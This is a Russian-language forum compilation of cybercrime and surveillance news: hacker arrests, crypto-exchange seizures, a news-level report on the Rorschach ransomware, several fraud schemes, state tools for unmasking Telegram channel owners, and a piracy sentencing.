В статье также указано, что еще одно ПО способно собирать пароли, вводимые на HTTP веб-сайтах, а третья программа — идентифицировать анонимных пользователей социальных сетей и взламывать учетные записи людей.
Выводы, мое личное мнение. Похоже, используя dpi детектят некие фингерпринты трафика мессенджеров + регистрируют события с базовых станций операторов связи, привязывая это к идентификаторам пользователя телефона imsi/imei/msisdn . Возможно регистрируются события immediate attach и detach (которые отправляет телефон при корректном выключении "кнопкой" или активации режима "самолет").
Таким образом строят цепочки взаимодействия между пользователями и привязывают данные события к геолокации и конкретным телефонным номерам. Формируют графы взаимосвязей между разными людьми и выявляют имеются ли у человека "анонимные" телефоны - которыми он пользуется, но при этом сим зарегистрирована не на него.
Просьба - если кому-то попадутся указанные слитые файлы с техническим описанием программного обеспечения контор MFI Soft, Vas Experts, Protei - пришлите, пожалуйста . Прикреплю в это сообщение.
Сотрудники колумбийских правоохранительных органов задержали международного хакера Михая Ионута Паунеску (Mihai Ionut Paunescu). Правительство США в течение нескольких лет охотилось за Паунеску за создание компьютерных вирусов, взломы, банковское мошенничество и мошенничество с использованием средств связи. Обвинения гражданину Румынии были предъявлены еще в 2012 году.
В США Паунеску обвиняется в участии в киберпреступной сети, создавшей нашумевшее вредоносное ПО Gozi. Злоумышленники рассылали вредонос крупным компаниям и правительственным организациям в виде прикрепленного файла в электронных письмах. После установки на системе Gozi проникал в сети и похищал секретные данные, в том числе банковские пароли и идентификационные данные, а также перехватывал и переадресовывал денежные переводы.
Согласно Государственному департаменту США, троян Gozi заражал компьютеры организаций в США, Германии, Великобритании, Польше, Франции, Финляндии, Италии и Турции. Помимо прочего, в список жертв входят многонациональные компании, банки и организации наподобие NASA.
После ареста следственным подразделением национальной полиции DIJIN Михай Ионут Паунеску был передан в распоряжение генеральной прокуратуры Колумбии. Колумбийские власти незамедлительно связались со своими коллегами в США, чтобы те могли начать подготовку процедуры экстрадиции задержанного.
Они обзванивали пенсионеров и пытались обмануть по схеме «Ваш родственник попал в ДТП»
Всего задержали 4 человека, всем от 14 до 17 лет. Они скаманули 84-летнюю бабулю на 250 тысяч рублей.
Теперь малолетним скамерам светит уголовка.
Жительница американского Сиэтла (штат Вашингтон) приговорена местным судом к 2,5 года реального и пяти годам условного срока за мошенничество с персональными данными. Портал Komo News пишет, что 49-летняя Дженнифер Суазо (Jennifer Suazo) купила в даркнете персональные данные 316 человек, после чего завела на их имена сотни новых банковских счетов и получила доступ к уже существующим, украв в общей сложности 107 тысяч долларов.
Активность Суазо проявляла на протяжении трех лет — с 2019-го по 2022-й. В течение этого времени, по данным местной прокуратуры, женщина создавала документы на имена жертв, но своей фотографией, меняла их почтовые адреса и вносила деньги с чеков пострадавших на свои счета. Смена почты позволяла ей еще и получать обеспокоенные сообщения от банков и таким образом скрывать мошенничество от своих жертв.
«Последствия
ее действий были далеко идущими: Суазо не только истощила ресурсы
правоохранительных органов штата и федеральных органов, которые были
направлены на выявление жертв и отслеживание мошеннических транзакций, но и
вызвала у них постоянное беспокойство по поводу безопасности их учетных
записей», — прокомментировала приговор специальный помощник прокурора США
Джессика Ли (Jessica Ly).
source: komonews.com/news/local/washington-woman-found-guilty-bank-fraud- identity-theft-over-300-using-dark-web-information-prison-department-of- justice-finance-crime-criminal-law-enforcement-credit-loan-sentence
ФБР США заблокировали 9 криптовалютных бирж, предположительно обслуживающих киберпреступников.
Захваченные домены, в том числе «uxbtc.com», «trust-exchange.org», «bitcoin24.exchange», «paybtc.pro» и «owl.gold», работали на английском и русском языках, и предлагали анонимные конвертации криптовалюты.
Биржи пользовались спросом среди преступников, поскольку площадки не имели какого-либо ограничения для отмывания денег и собирали либо минимальную информацию о клиентах, либо вообще не собирали ее.
По данным ФБР, многие из платформ рекламируются на преступных форумах.
Большая часть преступной деятельности на биржах была связана с мошенниками и киберпреступниками, ответственными за атаки программ-вымогателей.
source: justice[.]gov/usao-edmi/pr/fbi-disrupts-virtual-currency-exchanges- used-facilitate-criminal-activity
В Подмосковье подозреваемого в растрате совладельца неназванной криптовалютной биржи задержали с чемоданами денег. Об этом сообщает пресс-служба МВД.
По данным CEO Indefibank Сергея Менделеева, речь идет о задержании «красного админа» WEX Алексея Билюченко.
По данным следствия, злоумышленник контролировал движение крупных сумм в криптовалютах и их перевод на электронные кошельки. Воспользовавшись своим положением, он вывел часть средств и присвоил их.
В момент задержания у подозреваемого находились два чемодана со 190 млн рублей. Открыто уголовное дело о растрате активов криптобиржи.
Правоохранители провели 29 обысков в помещениях, принадлежащих фигуранту и его предполагаемым сообщникам, в Москве, Санкт-Петербурге, Новосибирске и Ялте. Изъято свыше 50 млн рублей, $1 млн, 70 000 евро, дорогостоящее компьютерное оборудование, аппаратные криптокошельки, предметы роскоши и документы.
Задержанный помещен под стражу, на его счет наложен арест. В суд также направлено ходатайство об аресте имущества стоимостью более 2 млрд рублей.
Напомним, криптовалютная биржа WEX является правопреемницей торговой платформы BTC-e.
Летом 2017 года WEX выкупила аккаунты клиентов площадки BTC-e после закрытия и ареста счетов последней. WEX переняла на себя долговые обязательства BTC-e и к апрелю 2018 года выплатила 20% от общей суммы.
В том же месяце действующий на тот момент CEO WEX Дмитрий Васильев и экс- боевик «ДНР» Дмитрий «Морячок» Хавченко заключили договор о намерениях по продаже биржи.
В июле 2018 года сделка по передаче прав собственности «Морячку» перешла в завершающую стадию. Позднее Хавченко оформил на свою дочь Дарью официального оператора биржи — сингапурскую компанию World Exchange Services.
В августе того же года стало известно о банкротстве биржи и приостановке ее работы. Инициативная группа клиентов биржи подсчитала, что ущерб превысил $400 млн. Лично Васильеву приписывают вывод $200 млн.
В ноябре 2019 года издание BBC сообщило, что к покупке WEX и дальнейшему выводу с нее средств причастен российский предприниматель, владелец группы компаний «Царьград» Константин Малофеев.
Согласно признательным показаниям «красного админа» WEX Алексея Билюченко, средства пользователей биржи его под угрозами заставили перевести на личные кошельки сотрудников ФСБ РФ, в частности, Антона Немкина.
source: mvdmedia.ru/news/ofitsialnyy-predstavitel/irina-volk-sledovateli-mvd- rossii-rassleduyut-pervoe-v-strane-ugolovnoe-delo-o-rastrate-denezhnykh-s
Об этом в своем телеграм-канале написал основатель Killnet, известный в даркнете под ником KillMilk.
«Из-за инцидента с арестом основателя Анонимус России в Республика Беларусь — вынужден принять тяжелое совместное решение с командой KILLNET COLLECTIVE о деаноне активного участника в развитии хактивизма России.
Арсений (основатель „Анонимус Россия“) отличный парень, патриот — но был не аккуратен. За что сейчас платит своим сообществом и статусом», — говорится в посте.
Фото паспорта задержанного основателя «Анонимус Россия», t.me/killmilk_rus
В нем также сообщается, что задержанный находится в СИЗО № 3 Гомеля.
Высказываются также претензии в адрес «оперативного сотрудника @o_tapka_o из
Беларуси», который «не шел с нами на контакт что в дальнейшем лишит его
статуса человека от слова совсем».
KillMilk пишет, что у «Анонимус Россия» теперь новый глава — Radis.
В партнерских хакерских группах размещены сообщения поддержки задержанного, а также выдвинут ультиматум белорусским властям. Так, якобы белорусская прокремлевская хакерская группа Infinity Hackers BY обещает атаковать белорусские государственные сайты, если в течении 10 часов лидер «Анонимус Россия» не будет освобожден, [сообщает](https://reform- by.cdn.ampproject.org/c/s/reform.by/rossijskie-hakery-utverzhdajut-chto-odin- iz-ih-liderov-zaderzhan-v-gomele/amp) reform.by.
«Киберпартизан» пишет, что задержанный, вероятно, 18-летний уроженец Гомеля Арсений Елисеев.
«Чертовски быстрая» новинка уделывает по скорости работы даже нашумевший
LockBit.
Исследователи кибербезопасности CheckPoint раскрыли ранее недокументированный вид программы-вымогателя под названием Rorschach, который имеет весьма сложную структуру и высокую производительность.
«Что отличает Rorschach от других штаммов программ-вымогателей, так это высокий уровень настройки и уникальные функции, которых раньше не было в программах-вымогателях. К тому же Rorschach — один из самых быстрых штаммов программ-вымогателей, когда-либо наблюдаемых, с точки зрения скорости его шифрования», — говорится в [новом отчёте](https://research.checkpoint.com/2023/rorschach-a-new-sophisticated- and-fast-ransomware/) CheckPoint.
Вымогатель не имеет брендинга или дублирующей информации, которая связывала бы его с какой-либо ранее известной хакерской группировкой. Однако подробный анализ исходного кода Rorschach обнаруживает его сходство с программой- вымогателем Babuk, код которой утёк в сеть ещё в сентябре 2021 года. Что-то общее у Rorschach специалисты нашли и с LockBit 2.0. Вдобавок ко всему, записки о выкупе, разосланные жертвам, похоже, вдохновлены записками из вымогателей Yanluowang и DarkSide.
Наиболее интересным аспектом вторжения является использование метода DLL Sideloading для получения полезной нагрузки. Этот метод крайне редко используется в программах-вымогателях. В кампании, которую наблюдали специалисты CheckPoint, программа-вымогатель была развернута путем злоупотребления инструментом Cortex XDR Dump Service Tool (cy.exe) от Palo Alto Network для загрузки библиотеки с именем «winutils.dll».
Еще одна уникальная характеристика Rorschach — широкие возможности настройки и использование прямых системных вызовов для манипулирования файлами и обхода защитных механизмов. Программа завершает системные процессы, удаляет теневые тома и резервные копии; очищает журналы событий Windows, чтобы стереть следы, по которым судебные эксперты могут расследовать атаку; отключает брандмауэр Windows и даже удаляет сама себя после завершения своих действий.
Данная программа-вымогатель, как и многие другие недавно замеченные штаммы вредоносных программ, пропускает компьютеры, расположенные в странах СНГ, проверяя установленный в системе язык. Это снова наводит на мысль о стране происхождения авторов этих программ.
«Программа-вымогатель Rorschach использует высокоэффективную и быструю схему гибридной криптографии, которая сочетает в себе алгоритмы шифра curve25519 и eSTREAM hc-128», — объяснили исследователи CheckPoint. Этот процесс предназначен для шифрования только определенной части исходного содержимого файла, а не всего файла целиком, и использует дополнительные методы оптимизации компилятора, которые делают его «чертовски быстрым».
В пяти отдельных тестах, проведенных CheckPoint в контролируемой среде, 220 тысяч файлов были зашифрованы программой Rorschach в среднем за 4 минуты 30 секунд. А у LockBit 3.0, например, тот же процесс занял примерно 7 минут.
Как можно заметить, авторы Rorschach, похоже, взяли некоторые из «лучших»
функций ведущих программ-вымогателей, просочившихся в открытый доступ, и
интегрировали их вместе. В дополнении к принципиально новым возможностям
вредоноса по типу продвинутого уклонения от обнаружения и ускоренного
шифрования, все эти функции делают Rorschach довольно опасной угрозой, которую
нельзя оставлять без внимания. Особенно пользователям, живущим за пределами
стран СНГ.
Подробнее:
https://www.securitylab.ru/news/537391.php
Служба безопасности Украины совместно с правоохранителями Чехии задержала мошенников, которые похищали деньги с банковских счетов граждан Евросоюза.
Как сообщили в СБУ, злоумышленники специализировались на похищении денег с банковских счетов граждан Евросоюза через фишинговые ссылки в популярных интернет-магазинах.
По оперативным данным, с февраля прошлого года дельцы обманули более 1 тыс. жителей ЕС на общую сумму 160 млн в гривневом эквиваленте.
Отмечается, что в ходе следственно-оперативных действий в Украине задержан организатор группировки и его сообщник.
Кроме того, как проинформировали в спецслужбе, на территории Евросоюза задержаны еще 17 участников преступной группы. Среди них - граждане Беларуси.
По данным следствия, организатором незаконной деятельности является житель Киева, специалист в сфере ІТ. Своих сообщников он подыскивал через собственные связи, а также на платформе Darknet.
"Для реализации мошеннической схемы злоумышленники размещали на торговых интернет-платформах объявления о "продаже" популярных товаров по "привлекательной" цене. Для оформления заказа покупателям предлагали перейти по фишинговой ссылке, где они вносили реквизиты своих банковских карт", - говорится в сообщении.
Задержанным в Украине организатору мошеннической схемы и его сообщнику сообщено о подозрении по нескольким статьям Уголовного кодекса Украины: ч. 1 ст. 255 и ч. 2 ст. 255 (создание, руководство преступным сообществом или преступной организацией, а также участие в ней); ч. ч. 3, 5 ст. 27, ч. 4 ст. 28 и ч. 4 ст. 190 (организация завладения чужим имуществом путем обмана (мошенничество), совершенное повторно, путем незаконных операций с использованием электронно-вычислительной техники, в составе преступной организации).
Сейчас суд избрал им меру пресечения содержания под стражей без права внесения залога. Продолжается расследование для установления всех обстоятельств преступлений и привлечения виновных к ответственности.
• Source: https://t.me/SBUkr/7745
мошенников, обманывавших доверчивых украинцев.
Следователи Главного следственного управления совместно с оперативниками Департамента уголовного розыска Нацполиции разоблачили организованную преступную группу, совершавшую мошенничества в разных областях государства. В ее состав входило пять человек: трое мужчин и две женщины, четко распределившие между собой «функции».
Злоумышленники брали в аренду помещение под якобы пункт обмена валют и сразу проводили «ремонт»: делали отверстие в потолке для квадрокоптера и еще одно — в побеговой стене «кассира». Полицейские задержали злоумышленников при попытке обмануть очередного клиента. Сумма ущерба, нанесенная трем потерпевшим, составляет почти €50 000 и $25 000
Действовали фигуранты по заранее разработанной схеме: в сети интернет
размещали объявления с предложением приобрести иностранную валюту по более
выгодному курсу, чем в других обменниках. При этом их интересовали только
большие суммы.
Злоумышленники договаривались о встрече с потенциальным покупателем, затем брали в аренду помещение для обустройства обменного пункта. В подготовленном МАФе они делали специальный ремонт. Так в помещении появлялось два отверстия: в потолке — для квадрокоптера, с помощью которого похищали деньги, и в стене — для побега «работницы».
Когда «кассирша» получала деньги для обмена, сразу звонила по телефону «руководителю» с просьбой «открыть сейф» — это и был сигнал для сообщника- оператора беспилотника. Потом она переводила деньги в сетку, прикрепленную к дрону, и снова звонила по телефону «руководителю», но на этот раз просила «закрыть сейф»: после этих слов беспилотник с деньгами исчезал, а работница «обменника» убегала через «запасной выход». Только тогда клиент понимал, что его обманули.
Над необычным проектом ломают голову во ФСИН
До 50-60 тысяч IT-специалистов могли бы ежегодно подготавливать в...российских колониях. Амбициозный проект для ФСИН разработали осужденный (в прошлом программист) и его товарищ, с которым он вместе учился в школе Сколково.
Как стало известно «МК», осужденный по «наркотической» статье Аким Денисов высказывал идеи по поводу того, как можно было трудоустроить заключенных, еще в СИЗО «Бутырка» (находился там больше двух лет). Оказавшись в колонии, он приступил к исследованию темы возможный подготовки IT -специалистов в местах лишения свободы. Помогал ему в этом его приятель. Программисты в итоге создали совместный проект, который представили экспертам.
Согласно их исследованию, средний срок нахождения в колонии сегодня - около трех лет. Средней же срок освоения IT-специальности — полгода. Получается, что после того, как специалиста подготовят (если сразу начнут обучение после его прибытия), он может минимум два года проработать за решеткой по специальности.
При этом мотивированные, способные осужденные составляют 5-15% от общего количества ежегодно, что примерно 50-60 тысяч человек. Интересно, что доступ к интернету заключенным не обязателен. Авторы проекта разработали вариант внутренней платформы ФСИН для учета активности заключенного, контроля связи с внешним интернетом (если тот есть), коммуникации с командой заказчика и тд.
В среднем разработчик баз данных в России получает около 80 тысяч рублей (осужденный в колонии, занятый на швейном производстве, — около 7 тысяч).
«Ростех» приобрел платформу для вычисления владельцев анонимных
телеграм-каналов и будет предлагать эту услугу силовикам
Концерн, входящий в корпорацию «Автоматика» купил разработку у IT-компании T.Hunter ещё осенью 2021 года.
Государственная корпорация «Ростех» приобрела программу, которая может вычислять имена администраторов анонимных телеграм-каналов. Об этом [сообщили](https://thebell.io/nachali-sazhat-ponravilos-kak-sergey-chemezov- i-ego-piarshchik-navodyat-poryadok-v-telegram) издания The Bell и «Медуза».
Осенью 2021 года концерн «Автоматика» входящий в «Ростех» купил разработку петербургской IT-компании T.Hunter. Данная программа может устанавливать аккаунты администраторов и владельцев телеграм-каналов.
Программный комплекс «Охотник» может устанавливать владельцев аккаунтов с помощью нейросети, которая исследует открытые источники данных: соцсети, блоги, форумы, мессенджеры, доски объявлений, блокчейны криптовалют, даркнет и госсервисы. Помимо этого, доступ к своим базам предоставляют силовики. Общее число интегрированных источников данных — свыше 700 единиц.
Программа может анализировать более трёх десятков идентификаторов: имён, никнеймов, адресов электронной почты, сайтов, доменов, криптокошельков, а также ключей шифрования. Далее, как утверждает источник, обнародуются данные по номеру телефона, геолокации и IP-адресу.
В планах «Ростеха» поставлять программный комплекс во «все департаменты МВД», а также «оперативно-технические подразделения ФСБ». Предположительно, стоимость системы оценивается в несколько сотен миллионов рублей.
Курируют работы «Ростеха» по этому направлению директор по особым поручениям Василий Бровко и экс-сотрудник ФСБ Павел Селезнев (теперь вице- президентом госкорпорации по IT). Анализом телеграм-контента знанимается сотрудник АП Михаил Дудин, который был участников хакерской атаки на сайт Алексея Навального в 2021 году, а также бывший глава пресс-службы МВД и экс- начальник службы информации «Единой России» Павел Климовский.
Летом 2022 года по делу о вымогательстве у директора по особым поручениям Ростеха Василия Бровко и его жены Тины Канделаки администраторов телеграм- каналов задержали администраторов телеграм-каналов. В октябре того же года задержали коммерческого директора Ксении Собчак Кирилла Суханова, экс- главреда журнала «Татлер» Ариана Романовского и журналиста Тамерлана Бигаева. Всем им приписывают вину за вымогательство 11 млн рублей у Главы «Ростеха» Сергея Чемезова за то, что удалили посты в телеграм-канале «Тушите свет».
Более того, за месяц до ареста администраторов канала «Тушите свет» в Ульяновске был задержан блогер Анатолия Спирин. По версии обвинения, блогер «вымогал 150 тысяч рублей» у Василия Бровко в обмен на удаление постов о Тине Канделаки.Комментарий IT-эксперта «Роскомсвободы»:
«Для того, чтобы найти привязку конкретного аккаунта к конкретному номеру телефона, а там уже и реального человека, то приблизительные алгоритмы понятны. И каких-то неподъёмных в финансовом плане возможностей от подобных компаний, сотрудничающих с силовыми ведомствами, не требуется.
Но в случае с определением владельцев каналов нельзя наверняка предположить реальных схем, не замешивая либо какую-то 0day-уязвимость в API Телеграма, либо сотрудничество с кем-то с административным доступом к серверам мессенджера.
Единственное, если говорить об «анонимных» каналах, к которым привязаны чаты, если у него не включена анонимность и в этом чате тоже, то определить его будет крайне легко любому школьнику. А вот так, чтобы для любого случайно выбранного нужно больше подробностей об алгоритме работы, чтобы что-то объективно говорить».Click to expand...
Общенациональную известность приобрела в китайских соцсетях мошенница, присвоившая 8 млн юаней ($1,2 млн) с помощью более чем 300 кредитных карт, «привязанных» к 28 ничего не подозревавшим людям.
Однако, интерес публики вызвал не столько сам факт крупной аферы, сколько то, каким образом о ней стало известно полиции, рассказала 26 февраля газета South China Morning Post.
В декабре прошлого года к правоохранителям обратился супруг некоей Ли из провинции Сычуань, случайно обнаруживший в доме множество кредитных карт и выписок по кредитным счетам, связанных с крупными транзакциями, и решивший, что супруга стала жертвой мошенничества. И уже потом выяснилось, что его жена на протяжении ряда лет сама занималась преступным бизнесом.
Ли придумала аферу в 2016 году после того, как не сумела погасить «висевший на ней долг». Она выдала себя за сотрудницу местного правительственного департамента и обратилась к состоятельным людям, пообещав, что благодаря ее помощи они смогут получить высокую процентную ставку в банке.
Доверчивые «клиенты» доверили ей данные своих кредитных и дебетовых карт, а Ли воспользовалась ими для поддержания экстравагантного образа жизни и путешествий.
Шокирующие подробности вызвали многочисленные комментарии у пользователей социальных сетей Китая.
«Как могла Ли скрывать мошенничество в течение шести лет? Неужели ни у кого из жертв не возникло подозрений?» — недоумевает один из них. «Несчастный муж!» — сочувствует другой.
Роскомнадзор будет блокировать mesh-сети, I2P, TOR, TON, Freenet, Zeronet, anoNet.
Как следует из размещённого на сайте госзакупок контракта, подведомственный Роскомнадзору «Главный радиочастотный центр» заключил сделку с Российской академии наук на выполнение ряда работ стоимостью более 9 миллионов рублей.
При проведении работ должны быть разработаны комплексные рекомендации по ограничению доступа к запрещенной информации с использованием mesh-сетей (в контракте указаны Yggdrasill, cjDNS, Briar, Signal Offline, FireChat), I2P, TOR, Telegram Open Network, Freenet, Zeronet, anoNet, а также технологий и протоколов IoT
Окончание работ – 30 июня 2020 года.
<https://zakupki.gov.ru/223/purchase/public/purchase/info/common- info.html?regNumber=32008950175>
Совсем скоро совершать кибератаки на другие страны будет не противозаконно, а похвально и престижно.
Как известно, вскоре после начала событий февраля прошлого года множество хакеров, работающих из разных точек земного шара как самостоятельно, так и в небольших группах, начали совершать кибератаки на российские организации в различных отраслях, действуя якобы в интересах Украины. Но поскольку совершать подобные действия в чьих бы то ни было интересах — незаконно, правительство Украины придумало изящный выход из положения.
Новый законопроект, активно продвигаемый властями Украины, позволит узаконить хакерство и прочие зловредные действия в интересах страны. Любые добровольческие хакерские бригады, действующие как на территории самой Украины, так и с территории других стран — планируется официально включить в состав вооруженных сил Украины, структурировать и легализовать.
«Закон о создании и функционировании киберподразделений в составе Минобороны Украины должен быть принят как можно скорее», — заявила Наталья Ткачук, секретарь Национального координационного центра кибербезопасности Украины.
Ткачук также добавила, что новый закон станет «основой для наращивания потенциала киберзащиты государства, привлечения к этой деятельности киберволонтеров и создания киберрезерва» — отряда гражданских киберэкспертов, подготовленных военными, которые могут быть мобилизованы для обеспечения национальной безопасности.
Украина планирует перенять эстонский опыт в создании эффективной кибервоенной инфраструктуры — создать кадры, чья техническая пригодность будет определяться во время обязательной военной службы, а затем проходить дополнительную подготовку. Изученные в процессе навыки позволят специалистам эффективно защищать страну в киберпространстве во время прохождения обязательной службы, а также приносить пользу стране даже по увольнению в запас. Согласно юридическому анализу НАТО, принятие эстонской модели киберрезерва также сняло бы вопросы о правовом статусе украинской IT-армии для Украины.
Кроме того, по сообщениям анонимных американских источников, Украина также планирует заручиться плотной поддержкой правительственных хакеров из США, чтобы дополнительно нарастить свои силы в этой области. Однако, по сообщению тех же источников, пока что ведомства не могут придти к единому мнению по поводу условий подобного сотрудничества.
Точных сроков по принятию и внедрению законопроекта названо не было. А даже если он будет принят в ближайшее время, реализовать столь масштабную реструктуризацию едва ли получится быстро.
Anyone hear about developer possibly being arrested?
Аналитическая компания PeckShield зафиксировала перемещение 48 998 BTC (около
$1,08 млрд по курсу на момент написания), конфискованных правительством США у
даркнет-маркетплейса Silk Road.
#PeckShieldAlert 49k $BTC (worth $1 Billion) from wallets related to US Government law enforcement seizures have been transferred to #Coinbase (~9.8k $BTC, worth $217M), bc1qf2…fsv (30k $BTC) & bc1qe7…rdg (9k $BTC) #SilkRoad pic.twitter.com/4MzlvDzkut
— PeckShieldAlert (@PeckShieldAlert) March 8, 2023
Click to expand...
30 174 BTC и 8999 BTC поступили на два новых кошелька, а еще 9825 BTC — на американскую криптовалютную биржу Coinbase.
На двух адресах правоохранителей США хранились 51 352 BTC, изъятых у Silk Road
в ноябре 2021 и марте 2022 года.
source: twitter.com/PeckShieldAlert/status/1633331891347820544
Полиция изучает изъятое оборудование, чтобы определить точную роль подозреваемых в группировке.
Европол объявил, что в ходе совместной операции немецких и украинских спецслужб были проведены обыски в домах предполагаемых ключевых участников банды вымогателей DoppelPaymer. Считается, что банда DoppelPaymer связана с группировкой Evil Corp.
Кроме того, украинская полиция допросила гражданина Украины, который предположительно является одним из основных членов DoppelPaymer. Также обыски были проведены в Киеве и Харькове.
По сообщениям Европола, следователи в настоящее время анализируют изъятое оборудование, чтобы определить точную роль подозреваемых в структуре группы DoppelPaymer.
Группировка DoppelPaymer впервые была обнаружена в 2019 году и достигла своего пика в 2020 году. По данным TrendMicro, хакеры DoppelPaymer требовали от жертв выкупы в размере от $25 тысяч до $1,2 млн. Властям Германии известно о 37 жертвах DoppelPaymer. По оценкам, жертвы из США заплатили DoppelPaymer более $40 млн.
В 2021 году программа-вымогатель DoopelPaymer была переименована в Grief , чтобы избежать внимания правоохранительных органов. За время своего существования Grief атаковала 96 организации.
source: europol.europa.eu/media-press/newsroom/news/germany-and-ukraine-hit- two-high-value-ransomware-targets
В октябре прошлого года Шон Галлахер, старший исследователь угроз в фирме по кибербезопасности Sophos, получил неожиданное смс-сообщение от молодой малайзийской девушки, назвавшейся Харли. Она сказала, что ранее управляла винным бизнесом в Ванкувере, но из-за пандемии COVID-19 бизнес пришлось свернуть, и в результате Харли научилась зарабатывать деньги с помощью другой торговли — криптовалютной.
Харли сказала Шону, что готова поделиться с ним всеми своими секретами, на что он с радостью согласился, ведь нет ничего интереснее и забавнее, чем наблюдать за действиями киберпреступника, который пытается «развести» киберспециалиста. Разговор с Харли привел Шона Галлахера к другому злоумышленнику из Камбоджи (модератору команды), который, по его словам, за полгода заработал более 3 миллионов долларов в криптовалюте.
В этих мошеннических схемах киберпреступники используют тактику социальной инженерии и метод, который принято называть «разделка свиней». Злоумышленники якобы «случайно» находят своих жертв, на протяжении нескольких недель или месяцев втираются в доверие и затем предлагают «быстро заработать», для чего жертвы должны раскрыть свою конфиденциальную информацию или перевести деньги на криптокошелёк мошенника. Своих жертв такие «разводилы» чаще всего находят через приложения для знакомств, сайты социальных сетей и т.п.
Тексты мошенников выглядят как случайные сообщения, но на самом деле предназначены для рассылки большому количеству потенциальных жертв и выборочного взаимодействия с теми, кто отвечает. Злоумышленники обычно убеждают своих жертв перейти на другую платформу обмена сообщениями (в случае Галлахера, это был Telegram), а затем обманом заставляют их вносить деньги в поддельные децентрализованные финансовые приложения.
По словам Галлахера, мошенническая сеть, раскрытая Sophos, является всего лишь одной из сотен подобных, использующих похожие приманки и почти идентичные веб- сайты и приложения. Например, в то время как Sophos готовил свой отчет, с командой связался человек из США, история которого почти в точности отражала опыт Галлахера, за несколькими исключениями — девушка утверждала, что она вьетнамка и раньше занималась косметикой из Нью-Йорка.
В целом, этот тип приманки особенно популярен среди китайских операций организованной преступности, работающих в странах Юго-Восточной Азии, включая Камбоджу, Мьянму и Лаос.
В качестве подставных лиц в мошеннических командах обычно есть молодой человек — Харли, из примера выше, которая действовала в качестве приманки, а также целая группа, которая создаёт поддельный медиаконтент, чтобы предоставить ряд ложных доказательств, в которые поверит жертва и «инвестирует» в кошелёк мошенников.
По словам Галлахера, длительная продолжительность и сложность коммуникаций, которые поддерживают эти мошеннические сети, делают их убедительными даже для скептически настроенных жертв. Но мошенничество редко бывает безупречным: иногда история успеха противоречива, мошенники плохо говорят по-английски и слишком откровенны в своих мотивах заставить свою жертву инвестировать деньги в криптовалюту.
В случае Галлахера, девушка Харли проинструктировала его купить криптовалюту на сумму не менее 2000 долларов с помощью определённого криптокошелька, и даже направила ему ссылку, ведущую на поддельную криптоплатформу. Позже специалисты Sophos обнаружили в открытом доступе и другие похожие приложения, все они были созданы китаеязычными программистами.
Галлахер считает, что у мошенников есть все шансы «ловить в свой капкан» куда больше жертв, если они ещё сильнее проработают свою схему и сделают её убедительнее, чем сейчас. Он также добавил, что просвещение о масштабах подобных мошеннических тактик остаётся лучшей защитой от них.
• Source: [https://news.sophos.com/en-us/2023/...ping-on-a-cambodia-based-pig- butchering-scam/](https://news.sophos.com/en-us/2023/02/28/sour-grapes- stomping-on-a-cambodia-based-pig-butchering-scam/)
Владелец пиратского ТВ-стриминга Gears TV в результате своей деятельности совершил 62 преступления в совокупности на 98 лет тюрьмы. Но он заключил сделку с властями, вследствие чего его посадят максимум на 19,5 лет. Он поплатится не только свободой, но и миллионами долларов, десятками домов и огромной коллекцией машин. Все это будет конфисковано в пользу государства.
Век в тюрьме
Американские власти приговорили YouTube-блогера Билла Омара Карраскильо (Bill Omar Carrasquillo) к почти 16 годам лишения свободы за создание пиратского стримингового сервиса Gears TV. Как пишет TorrentFreak, это крайне удачное стечение обстоятельств для кибер-преступника, поскольку все его виртуальные прегрешения могли обернуться для него 98 годами тюрьмы.
По данным TorrentFreak, Карраскильо, известный на YouTube под псевдонимом Omi in a Hellscat был обвинен в 62 случаях нарушения закона. В частности, его уличили в многократном нарушении авторских прав, мошенничестве с электронными устройствами, отмывании денег, уклонении от уплаты налогов и в ряде других преступлений.
Однако вместо 98 лет он проведет в тюрьме не более 19 с половиной лет, потому что свою вину он признал лишь частично.
Бизнес на широкую ногу
Суд сумел доказать, что Карраскильо стоит за крупным пиратским IPTV-сервисом под названием Gears TV и является его руководителем. Сервис предлагал пользователям контент, украденный у различных провайдеров кабельного телевидения
Карраскильо и его подельники в период с марта 2016 по ноябрь 2019 гг. зарегистрировали множество поддельных договоров с провайдерами Charter Communications, Comcast, DirecTV, Frontier Corporation и Verizon Fios. За указанный период они мошенники получили от них несколько сотен ТВ-приставок.
Карраскильо вместе с другими «предпринимателями» снимали с получаемого от провайдеров контента защиту от копирования и в дальнейшем транслировали его пользователям Gears TV с использованием специального оборудования.
В общей сложности ущерб, нанесенный Карраскильо и его подельниками телекомпаниям, достиг $176 млн. «Карраскильо лично получил прибыль от заговора в размере более $30 млн», – указано в судебных документах.
62 обвинительных акта
В первоначальном обвинительном заключении Карраскильо присутствовал длинный список преступлений, состоявший из 62 пунктов. Многие нарушения повторялись – например, Карраскильо вменялись 20 пунктов обвинения в нарушении авторских прав, шесть пунктов мошенничества с использованием электронных средств, три пункта ложных заявлений в банк, 19 пунктов денежных операций в рамках выявленной незаконной деятельности, четыре пункта уклонения от налогов и пр.
Все обвинения были предъявлены Карраскильо в сентябре 2021 г. Впоследствии он заключил с правительством США письменное соглашение о признании вины, но лишь по 10 пунктам.
Карраскильо признался в: заговоре с целью совершения тяжкого преступления и мелкого правонарушения, нарушения авторских прав, обхода средств контроля доступа, мошенничества с устройствами доступа и мошенничества с использованием электронных средств с марта 2016 по 23 ноября 2019 гг.; в обход устройства контроля доступа в тот же период времени; в транслировании охраняемого авторским правом контента с 24 мая 2019 по 20 ноября 2019 гг. Также Карраскильо сообщил о нескольких случаях отмывания денег, и уклонении от налогов.
Ни свободы, ни денег, ни машин
Годы в тюрьме в тюрьме – далеко не единственное, что ждет Omi in a Hellscat. С его банковских счетов было изъято почти $5,9 млн – вся сумма будет конфискована. Также блогер, построивший карьеру на YouTube, будет вынужден расстаться со своей коллекцией из 50 автомобилей. Дополнительно у него конфискуют около 50 объектов недвижимости, большинство из которых находятся в штате Филадельфия (США).
Помимо этого, Карраскильо выплатит жертвам своей деятельности компенсацию, размер которой скоро будет определен судом.
Скостить срок по максимуму
Власти хотели посадить Omi in a Hellscat за решетку на 98 лет, основываясь на том факте, что его сервис незаконно транслировал защищенный авторским правом контент в круглосуточном режиме на протяжении нескольких лет. В судебных документах говорится, что за все время существования Gears TV пользовательская база разрослась до более 148 тыс. человек. В совокупности все его нарушения потянули именно именно на 98 лет тюрьмы, но, похоже, такой исход с самого начала был крайне маловероятным.
Как пишет TorrentFreak, Карраскильо ожидало заключение на срок от 24 до 30 лет. Теперь же его хотят посадить минимум на 15 лет и восемь месяцев и максимум на 19 лет и семь месяцев.
Приговор Карраскильо будет вынесен в апреле 2023 г. Дадут ли ему возможность обжаловать его, неизвестно.
